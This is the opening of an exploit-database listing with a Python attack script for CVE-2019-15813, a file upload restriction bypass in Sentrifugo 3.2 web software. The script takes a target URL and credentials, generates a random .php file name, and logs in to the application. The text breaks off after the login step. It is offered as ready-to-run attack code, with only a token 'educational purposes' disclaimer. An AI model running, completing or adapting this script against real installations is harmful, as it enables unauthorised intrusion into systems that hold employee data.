Exploits / Vulnerability Discovered : 2020-10-27 |
Type : webapps |
Platform : php
This exploit / vulnerability Sentrifugo 3.2 file upload restriction bypass (authenticated) is for educational purposes only and if it is used you will do on your own risk!
from argparse import ArgumentParser, RawTextHelpFormatter
from bs4 import BeautifulSoup, Tag
from requests.sessions import Session
import tempfile as tmp
import os.path as path
import random
import string
from huepy import *
parser = ArgumentParser(description="Exploit for CVE-2019-15813",
formatter_class=RawTextHelpFormatter)
parser.add_argument("--target",
"-t",
help="target uri where application is installed",
required=True,
metavar="",
dest="t")
parser.add_argument("--user",
"-u",
help="username to authenticate",
required=True,
metavar="",
dest="u")
parser.add_argument("--password",
"-p",
help="password to authenticate",
required=True,
metavar="",
dest="p")
args = parser.parse_args()
if args.t.endswith("/"):
args.t = args.t[:-1]
F = "".join(random.choices(string.ascii_letters, k=13)) + ".php"
with Session() as http:
print(run("Logging in"))
data = {"username": args.u, "password": args.p}
r = http.post(args.t + "/index.php/index/loginpopupsave",
data=data,
allow_redirects=False)
if not (r.headers.get("Location", "").endswith("welcome")
or r.headers.get("Location", "").endswith("welcome/")):
print(bad("Unable to login. Check username / password"))
exit(1)
print(good("Logged in"))